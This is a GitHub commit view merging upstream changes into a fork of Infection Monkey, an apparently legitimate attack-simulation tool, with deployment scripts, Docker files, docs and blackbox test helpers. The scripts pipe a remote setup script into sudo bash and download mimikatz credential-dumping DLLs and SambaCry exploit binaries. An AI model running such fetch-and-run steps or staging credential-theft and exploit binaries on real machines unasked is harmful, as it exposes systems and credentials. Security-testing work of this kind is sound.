Merge pull request #1 from guardicore/develop

Updating my local fork
This commit is contained in:
Shivank 2019-10-28 15:14:53 +05:30 committed by GitHub
commit 4518b93260
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
448 changed files with 26046 additions and 7070 deletions

16
.gitignore vendored
View File

@ -68,3 +68,19 @@ bin
/monkey/monkey_island/cc/server.crt
/monkey/monkey_island/cc/server.csr
/monkey/monkey_island/cc/ui/node_modules/
# User files
/monkey/monkey_island/cc/userUploads
# MonkeyZoo
# Network status files
MonkeyZoo/*
# Except
!MonkeyZoo/main.tf
!MonkeyZoo/variables.tf
!MonkeyZoo/README.MD
!MonkeyZoo/config.tf
!MonkeyZoo/MonkeyZooDocs.pdf
# vim swap files
*.swp

View File

@ -3,12 +3,6 @@ language: python
cache: pip
python:
- 2.7
- 3.6
matrix:
include:
- python: 3.7
dist: xenial # required for Python 3.7 (travis-ci/travis-ci#9069)
sudo: required # required for Python 3.7 (travis-ci/travis-ci#9069)
install:
#- pip install -r requirements.txt
- pip install flake8 # pytest # add another testing frameworks later

View File

@ -2,11 +2,13 @@
Thanks for your interest in making the Monkey -- and therefore, your network -- a better place!
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker](https://github.com/guardicore/monkey/issues).
Are you about to report a bug? Sorry to hear it. Here's our
[Issue tracker](https://github.com/guardicore/monkey/issues).
Please try to be as specific as you can about your problem; try to include steps
to reproduce. While we'll try to help anyway, focusing us will help us help you faster.
If you want to contribute new code or fix bugs..
If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the
maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk).
## Submitting code
@ -20,7 +22,17 @@ The following is a *short* list of recommendations. PRs that don't match these c
* **Don't** leave your pull request description blank.
* **Do** license your code as GPLv3.
Also, please submit PRs to the develop branch.
Also, please submit PRs to the `develop` branch.
#### Unit tests
**Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same
filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`.
Please try to read some of the existing unit testing code, so you can see some examples.
#### Branch naming scheme
**Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; For example,
`400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`.
## Issues
* **Do** write a detailed description of your bug and use a descriptive title.

View File

@ -30,7 +30,6 @@ The Infection Monkey uses the following techniques and exploits to propagate to
* Multiple exploit methods:
* SSH
* SMB
* RDP
* WMI
* Shellshock
* Conficker
@ -41,10 +40,13 @@ Setup
-------------------------------
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
Building the Monkey from source
-------------------------------
If you want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder.
If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island).

View File

@ -0,0 +1,24 @@
# Files used to deploy development version of infection monkey
## Windows
Before running the script you must have git installed.<br>
Cd to scripts directory and use the scripts.<br>
First argument is an empty directory (script can create one) and second is branch you want to clone.
Example usages:<br>
./run_script.bat (Sets up monkey in current directory under .\infection_monkey)<br>
./run_script.bat "C:\test" (Sets up monkey in C:\test)<br>
powershell -ExecutionPolicy ByPass -Command ". .\deploy_windows.ps1; Deploy-Windows -monkey_home C:\test" (Same as above)<br>
./run_script.bat "" "master"(Sets up master branch instead of develop in current dir)
Don't forget to add python to PATH or do so while installing it via this script.<br>
## Linux
You must have root permissions, but don't run the script as root.<br>
Launch deploy_linux.sh from scripts directory.<br>
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default).
Choose a directory where you have all the relevant permissions, for e.g. /home/your_username
Example usages:<br>
./deploy_linux.sh (deploys under ./infection_monkey)<br>
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)<br>
./deploy_linux.sh "" "master" (deploys master branch in script directory)<br>
./deploy_linux.sh "/home/user/new" "master" (if directory "new" is not found creates it and clones master branch into it)<br>

19
deployment_scripts/config Normal file
View File

@ -0,0 +1,19 @@
#!/usr/bin/env bash
# Absolute monkey's path
MONKEY_FOLDER_NAME="infection_monkey"
# Url of public git repository that contains monkey's source code
MONKEY_GIT_URL="https://github.com/guardicore/monkey"
# Monkey binaries
LINUX_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
LINUX_32_BINARY_NAME="monkey-linux-32"
LINUX_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64"
LINUX_64_BINARY_NAME="monkey-linux-64"
WINDOWS_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe"
WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
# Mongo url's
MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz"
MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz"

View File

@ -0,0 +1,48 @@
# Absolute monkey's path
$MONKEY_FOLDER_NAME = "infection_monkey"
# Url of public git repository that contains monkey's source code
$MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
# Link to the latest python download or install it manually
$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi"
# Monkey binaries
$LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
$LINUX_32_BINARY_PATH = "monkey-linux-32"
$LINUX_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64"
$LINUX_64_BINARY_PATH = "monkey-linux-64"
$WINDOWS_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe"
$WINDOWS_32_BINARY_PATH = "monkey-windows-32.exe"
$WINDOWS_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
$WINDOWS_64_BINARY_PATH = "monkey-windows-64.exe"
$SAMBA_32_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner32.so"
$SAMBA_32_BINARY_NAME= "sc_monkey_runner32.so"
$SAMBA_64_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner64.so"
$SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
# Other directories and paths ( most likely you dont need to configure)
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
$MONKEY_DIR = "\monkey\infection_monkey"
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
$MK32_DLL = "mk32.dll"
$MK64_DLL = "mk64.dll"
$TEMP_PYTHON_INSTALLER = ".\python.msi"
$TEMP_MONGODB_ZIP = ".\mongodb.zip"
$TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
$TEMP_CPP_INSTALLER = "cpp.exe"
$TEMP_NPM_INSTALLER = "node.msi"
$TEMP_PYWIN32_INSTALLER = "pywin32.exe"
$TEMP_UPX_ZIP = "upx.zip"
$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi"
$UPX_FOLDER = "upx394w"
# Other url's
$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi"
$MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
$OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
$NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe"
$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll"
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll"

View File

@ -0,0 +1,139 @@
#!/bin/bash
source config
# Setup monkey either in dir required or current dir
monkey_home=${1:-`pwd`}
if [[ $monkey_home == `pwd` ]]; then
monkey_home="$monkey_home/$MONKEY_FOLDER_NAME"
fi
# We can set main paths after we know the home dir
ISLAND_PATH="$monkey_home/monkey/monkey_island"
MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
MONGO_PATH="$ISLAND_PATH/bin/mongodb"
MONGO_BIN_PATH="$MONGO_PATH/bin"
ISLAND_DB_PATH="$ISLAND_PATH/db"
ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
handle_error () {
echo "Fix the errors above and rerun the script"
exit 1
}
log_message () {
echo -e "\n\n-------------------------------------------"
echo -e "DEPLOYMENT SCRIPT: $1"
echo -e "-------------------------------------------\n"
}
sudo -v
if [[ $? != 0 ]]; then
echo "You need root permissions for some of this script operations. Quiting."
exit 1
fi
if [[ ! -d ${monkey_home} ]]; then
mkdir -p ${monkey_home}
fi
git --version &>/dev/null
git_available=$?
if [[ ${git_available} != 0 ]]; then
echo "Please install git and re-run this script"
exit 1
fi
log_message "Cloning files from git"
branch=${2:-"develop"}
if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned
git clone --single-branch -b $branch ${MONKEY_GIT_URL} ${monkey_home} 2>&1 || handle_error
chmod 774 -R ${monkey_home}
fi
# Create folders
log_message "Creating island dirs under $ISLAND_PATH"
mkdir -p ${MONGO_BIN_PATH}
mkdir -p ${ISLAND_DB_PATH}
mkdir -p ${ISLAND_BINARIES_PATH} || handle_error
python_version=`python --version 2>&1`
if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then
echo "Python 2.7 is not found or is not a default interpreter for 'python' command..."
exit 1
fi
log_message "Updating package list"
sudo apt-get update
log_message "Installing pip"
sudo apt-get install python-pip
log_message "Installing island requirements"
requirements="$ISLAND_PATH/requirements.txt"
python -m pip install --user -r ${requirements} || handle_error
# Download binaries
log_message "Downloading binaries"
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_64_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_32_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_64_BINARY_URL}
# Allow them to be executed
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_32_BINARY_NAME"
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_64_BINARY_NAME"
# Get machine type/kernel version
kernel=`uname -m`
linux_dist=`lsb_release -a 2> /dev/null`
# If a user haven't installed mongo manually check if we can install it with our script
log_message "Installing MongoDB"
${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error
log_message "Installing openssl"
sudo apt-get install openssl
# Generate SSL certificate
log_message "Generating certificate"
cd ${ISLAND_PATH} || handle_error
openssl genrsa -out cc/server.key 1024 || handle_error
openssl req -new -key cc/server.key -out cc/server.csr \
-subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
# Install npm
log_message "Installing npm"
sudo apt-get install npm
# Update node
log_message "Updating node"
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
sudo apt-get install -y nodejs
log_message "Generating front end"
cd "$ISLAND_PATH/cc/ui" || handle_error
npm update
npm run dist
# Monkey setup
log_message "Installing monkey requirements"
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
cd ${monkey_home}/monkey/infection_monkey || handle_error
python -m pip install --user -r requirements_linux.txt || handle_error
# Build samba
log_message "Building samba binaries"
sudo apt-get install gcc-multilib
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
sudo chmod +x ./build.sh || handle_error
./build.sh
sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
log_message "Deployment script finished."
exit 0

View File

@ -0,0 +1,215 @@
function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, [String] $branch = "develop"){
# Import the config variables
. ./config.ps1
"Config variables from config.ps1 imported"
# If we want monkey in current dir we need to create an empty folder for source files
if ( (Join-Path $monkey_home '') -eq (Join-Path (Get-Item -Path ".\").FullName '') ){
$monkey_home = Join-Path -Path $monkey_home -ChildPath $MONKEY_FOLDER_NAME
}
# Set variables for script execution
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$webClient = New-Object System.Net.WebClient
# We check if git is installed
try
{
git | Out-Null -ErrorAction Stop
"Git requirement satisfied"
}
catch [System.Management.Automation.CommandNotFoundException]
{
"Please install git before running this script or add it to path and restart cmd"
return
}
# Download the monkey
$output = cmd.exe /c "git clone --single-branch -b $branch $MONKEY_GIT_URL $monkey_home 2>&1"
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\bin")
if ( $output -like "*already exists and is not an empty directory.*"){
"Assuming you already have the source directory. If not, make sure to set an empty directory as monkey's home directory."
} elseif ($output -like "fatal:*"){
"Error while cloning monkey from the repository:"
$output
return
} else {
"Monkey cloned from the repository"
# Create bin directory
New-Item -ItemType directory -path $binDir
"Bin directory added"
}
# We check if python is installed
try
{
$version = cmd.exe /c '"python" --version 2>&1'
if ( $version -like 'Python 2.7.*' ) {
"Python 2.7.* was found, installing dependancies"
} else {
throw System.Management.Automation.CommandNotFoundException
}
}
catch [System.Management.Automation.CommandNotFoundException]
{
"Downloading python 2.7 ..."
$webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_PYTHON_INSTALLER
# Check if installed correctly
$version = cmd.exe /c '"python" --version 2>&1'
if ( $version -like '* is not recognized*' ) {
"Python is not found in PATH. Add it manually or reinstall python."
return
}
}
# Set python home dir
$PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
# Get vcforpython27 before installing requirements
"Downloading Visual C++ Compiler for Python 2.7 ..."
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
# Install requirements for island
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
"Upgrading pip..."
$output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
$output
if ( $output -like '*No module named pip*' ) {
"Make sure pip module is installed and re-run this script."
return
}
& python -m pip install --user -r $islandRequirements
# Install requirements for monkey
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
& python -m pip install --user -r $monkeyRequirements
# Download mongodb
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){
"Downloading mongodb ..."
$webClient.DownloadFile($MONGODB_URL, $TEMP_MONGODB_ZIP)
"Unzipping mongodb"
Expand-Archive $TEMP_MONGODB_ZIP -DestinationPath $binDir
# Get unzipped folder's name
$mongodb_folder = Get-ChildItem -Path $binDir | Where-Object -FilterScript {($_.Name -like "mongodb*")} | Select-Object -ExpandProperty Name
# Move all files from extracted folder to mongodb folder
New-Item -ItemType directory -Path (Join-Path -Path $binDir -ChildPath "mongodb")
New-Item -ItemType directory -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "db")
"Moving extracted files"
Move-Item -Path (Join-Path -Path $binDir -ChildPath $mongodb_folder | Join-Path -ChildPath "\bin\*") -Destination (Join-Path -Path $binDir -ChildPath "mongodb\")
"Removing zip file"
Remove-Item $TEMP_MONGODB_ZIP
Remove-Item (Join-Path -Path $binDir -ChildPath $mongodb_folder) -Recurse
}
# Download OpenSSL
"Downloading OpenSSL ..."
$webClient.DownloadFile($OPEN_SSL_URL, $TEMP_OPEN_SSL_ZIP)
"Unzipping OpenSSl"
Expand-Archive $TEMP_OPEN_SSL_ZIP -DestinationPath (Join-Path -Path $binDir -ChildPath "openssl") -ErrorAction SilentlyContinue
"Removing zip file"
Remove-Item $TEMP_OPEN_SSL_ZIP
# Download and install C++ redistributable
"Downloading C++ redistributable ..."
$webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER)
Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop
Remove-Item $TEMP_CPP_INSTALLER
# Generate ssl certificate
"Generating ssl certificate"
Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR)
. .\windows\create_certificate.bat
Pop-Location
# Adding binaries
"Adding binaries"
$binaries = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\binaries")
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
$webClient.DownloadFile($LINUX_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_32_BINARY_PATH))
$webClient.DownloadFile($LINUX_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_64_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_32_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_64_BINARY_PATH))
# Check if NPM installed
"Installing npm"
try
{
$version = cmd.exe /c '"npm" --version 2>&1'
if ( $version -like "*is not recognized*"){
throw System.Management.Automation.CommandNotFoundException
} else {
"Npm already installed"
}
}
catch [System.Management.Automation.CommandNotFoundException]
{
"Downloading npm ..."
$webClient.DownloadFile($NPM_URL, $TEMP_NPM_INSTALLER)
Start-Process -Wait $TEMP_NPM_INSTALLER
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_NPM_INSTALLER
}
"Updating npm"
Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\ui")
& npm update
& npm run dist
Pop-Location
# Install pywin32
"Downloading pywin32"
$webClient.DownloadFile($PYWIN32_URL, $TEMP_PYWIN32_INSTALLER)
Start-Process -Wait $TEMP_PYWIN32_INSTALLER -ErrorAction Stop
Remove-Item $TEMP_PYWIN32_INSTALLER
# Create infection_monkey/bin directory if not already present
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
# Download upx
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){
"Downloading upx ..."
$webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
"Unzipping upx"
Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue
Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir
# Remove unnecessary files
Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER)
"Removing zip file"
Remove-Item $TEMP_UPX_ZIP
}
# Download mimikatz binaries
$mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
if(!(Test-Path -Path $mk32_path )){
"Downloading mimikatz 32 binary"
$webClient.DownloadFile($MK32_DLL_URL, $mk32_path)
}
$mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL
if(!(Test-Path -Path $mk64_path )){
"Downloading mimikatz 64 binary"
$webClient.DownloadFile($MK64_DLL_URL, $mk64_path)
}
# Download sambacry binaries
$samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR
$samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME
if(!(Test-Path -Path $samba32_path )){
"Downloading sambacry 32 binary"
$webClient.DownloadFile($SAMBA_32_BINARY_URL, $samba32_path)
}
$samba64_path = Join-Path -Path $samba_path -ChildPath $SAMBA_64_BINARY_NAME
if(!(Test-Path -Path $samba64_path )){
"Downloading sambacry 64 binary"
$webClient.DownloadFile($SAMBA_64_BINARY_URL, $samba64_path)
}
"Script finished"
}

View File

@ -0,0 +1,8 @@
SET command=. .\deploy_windows.ps1; Deploy-Windows
if NOT "%~1" == "" (
SET "command=%command% -monkey_home %~1"
)
if NOT "%~2" == "" (
SET "command=%command% -branch %~2"
)
powershell -ExecutionPolicy ByPass -Command %command%

1
docker/.dockerignore Normal file
View File

@ -0,0 +1 @@
*.md

View File

@ -1,19 +1,24 @@
FROM debian:jessie-slim
FROM debian:stretch-slim
LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
ARG RELEASE=1.6
ARG DEBIAN_FRONTEND=noninteractive
EXPOSE 5000
WORKDIR /app
ADD https://github.com/guardicore/monkey/releases/download/1.5.2/infection_monkey_1.5.2_deb.tgz .
ADD https://github.com/guardicore/monkey/releases/download/${RELEASE}/infection_monkey_deb.${RELEASE}.tgz .
RUN tar xvf infection_monkey_1.5.2_deb.tgz \
&& apt-get -yqq update \
&& apt-get -yqq upgrade \
&& apt-get -yqq install python-pip \
libssl-dev \
supervisor \
&& dpkg -i *.deb
RUN tar xvf infection_monkey_deb.${RELEASE}.tgz \
&& apt-get -yqq update \
&& apt-get -yqq upgrade \
&& apt-get -yqq install python-pip \
python-dev \
&& dpkg -i *.deb \
&& rm -f *.deb *.tgz
COPY stack.conf /etc/supervisor/conf.d/stack.conf
ENTRYPOINT [ "supervisord", "-n", "-c", "/etc/supervisor/supervisord.conf" ]
WORKDIR /var/monkey
ENTRYPOINT ["/var/monkey/monkey_island/bin/python/bin/python"]
CMD ["/var/monkey/monkey_island.py"]

22
docker/docker-compose.yml Normal file
View File

@ -0,0 +1,22 @@
version: '3.3'
services:
db:
image: mongo:4
restart: always
volumes:
- db_data:/data/db
environment:
MONGO_INITDB_DATABASE: monkeyisland
monkey:
depends_on:
- db
build: .
image: monkey:latest
ports:
- "5000:5000"
environment:
MONGO_URL: mongodb://db:27017/monkeyisland
volumes:
db_data:

View File

@ -1,4 +0,0 @@
[program:mongod]
command=/var/monkey_island/bin/mongodb/bin/mongod --quiet --dbpath /var/monkey_island/db
[program:monkey]
command=/var/monkey_island/ubuntu/systemd/start_server.sh

0
envs/__init__.py Normal file
View File

1
envs/monkey_zoo/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
logs/

View File

@ -0,0 +1,3 @@
# MonkeyZoo
These files are used to deploy Infection Monkey's test network on GCP.<br>
For more information view docs/fullDocs.md

View File

View File

@ -0,0 +1,19 @@
# Automatic blackbox tests
### Prerequisites
1. Download google sdk: https://cloud.google.com/sdk/docs/
2. Download service account key for MonkeyZoo project (if you deployed MonkeyZoo via terraform scripts then you already have it).
GCP console -> IAM -> service accounts(you can use the same key used to authenticate terraform scripts)
3. Deploy the relevant branch + complied executables to the Island machine on GCP.
### Running the tests
In order to execute the entire test suite, you must know the external IP of the Island machine on GCP. You can find
this information in the GCP Console `Compute Engine/VM Instances` under _External IP_.
#### Running in command line
Run the following command:
`monkey\envs\monkey_zoo\blackbox>python -m pytest --island=35.207.152.72:5000 test_blackbox.py`
#### Running in PyCharm
Configure a PyTest configuration with the additional argument `--island=35.207.152.72` on the
`monkey\envs\monkey_zoo\blackbox`.

View File

View File

@ -0,0 +1,17 @@
LOG_INIT_MESSAGE = "Analysis didn't run."
class AnalyzerLog(object):
def __init__(self, analyzer_name):
self.contents = LOG_INIT_MESSAGE
self.name = analyzer_name
def clear(self):
self.contents = ""
def add_entry(self, message):
self.contents = "{}\n{}".format(self.contents, message)
def get_contents(self):
return "{}: {}\n".format(self.name, self.contents)

View File

@ -0,0 +1,24 @@
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
class CommunicationAnalyzer(object):
def __init__(self, island_client, machine_ips):
self.island_client = island_client
self.machine_ips = machine_ips
self.log = AnalyzerLog(self.__class__.__name__)
def analyze_test_results(self):
self.log.clear()
all_monkeys_communicated = True
for machine_ip in self.machine_ips:
if not self.did_monkey_communicate_back(machine_ip):
self.log.add_entry("Monkey from {} didn't communicate back".format(machine_ip))
all_monkeys_communicated = False
else:
self.log.add_entry("Monkey from {} communicated back".format(machine_ip))
return all_monkeys_communicated
def did_monkey_communicate_back(self, machine_ip):
query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}}
return len(self.island_client.find_monkeys_in_db(query)) > 0

View File

@ -0,0 +1,11 @@
import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
@pytest.fixture(scope='module')
def island(request):
return request.config.getoption("--island")

View File

@ -0,0 +1,18 @@
import json
import os
class IslandConfigParser(object):
def __init__(self, config_filename):
self.config_raw = open(IslandConfigParser.get_conf_file_path(config_filename), 'r').read()
self.config_json = json.loads(self.config_raw)
def get_ips_of_targets(self):
return self.config_json['basic_network']['general']['subnet_scan_list']
@staticmethod
def get_conf_file_path(conf_file_name):
return os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
"island_configs",
conf_file_name)

View File

@ -0,0 +1,87 @@
from time import sleep
import json
import logging
from bson import json_util
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
MONKEY_TEST_ENDPOINT = 'api/test/monkey'
LOG_TEST_ENDPOINT = 'api/test/log'
LOGGER = logging.getLogger(__name__)
def avoid_race_condition(func):
sleep(SLEEP_BETWEEN_REQUESTS_SECONDS)
return func
class MonkeyIslandClient(object):
def __init__(self, server_address):
self.requests = MonkeyIslandRequests(server_address)
def get_api_status(self):
return self.requests.get("api")
@avoid_race_condition
def import_config(self, config_contents):
_ = self.requests.post("api/configuration/island", data=config_contents)
@avoid_race_condition
def run_monkey_local(self):
response = self.requests.post_json("api/local-monkey", dict_data={"action": "run"})
if MonkeyIslandClient.monkey_ran_successfully(response):
LOGGER.info("Running the monkey.")
else:
LOGGER.error("Failed to run the monkey.")
assert False
@staticmethod
def monkey_ran_successfully(response):
return response.ok and json.loads(response.content)['is_running']
@avoid_race_condition
def kill_all_monkeys(self):
if self.requests.get("api", {"action": "killall"}).ok:
LOGGER.info("Killing all monkeys after the test.")
else:
LOGGER.error("Failed to kill all monkeys.")
assert False
@avoid_race_condition
def reset_env(self):
if self.requests.get("api", {"action": "reset"}).ok:
LOGGER.info("Resetting environment after the test.")
else:
LOGGER.error("Failed to reset the environment.")
assert False
def find_monkeys_in_db(self, query):
if query is None:
raise TypeError
response = self.requests.get(MONKEY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
return MonkeyIslandClient.get_test_query_results(response)
def get_all_monkeys_from_db(self):
response = self.requests.get(MONKEY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(None))
return MonkeyIslandClient.get_test_query_results(response)
def find_log_in_db(self, query):
response = self.requests.get(LOG_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
return MonkeyIslandClient.get_test_query_results(response)
@staticmethod
def form_find_query_for_request(query):
return {'find_query': json_util.dumps(query)}
@staticmethod
def get_test_query_results(response):
return json.loads(response.content)['results']
def is_all_monkeys_dead(self):
query = {'dead': False}
return len(self.find_monkeys_in_db(query)) == 0

View File

@ -0,0 +1,49 @@
import requests
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
import logging
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
LOGGER = logging.getLogger(__name__)
class MonkeyIslandRequests(object):
def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address)
self.token = self.try_get_jwt_from_server()
def try_get_jwt_from_server(self):
try:
return self.get_jwt_from_server()
except requests.ConnectionError as err:
LOGGER.error(
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
assert False
def get_jwt_from_server(self):
resp = requests.post(self.addr + "api/auth",
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
verify=False)
return resp.json()["access_token"]
def get(self, url, data=None):
return requests.get(self.addr + url,
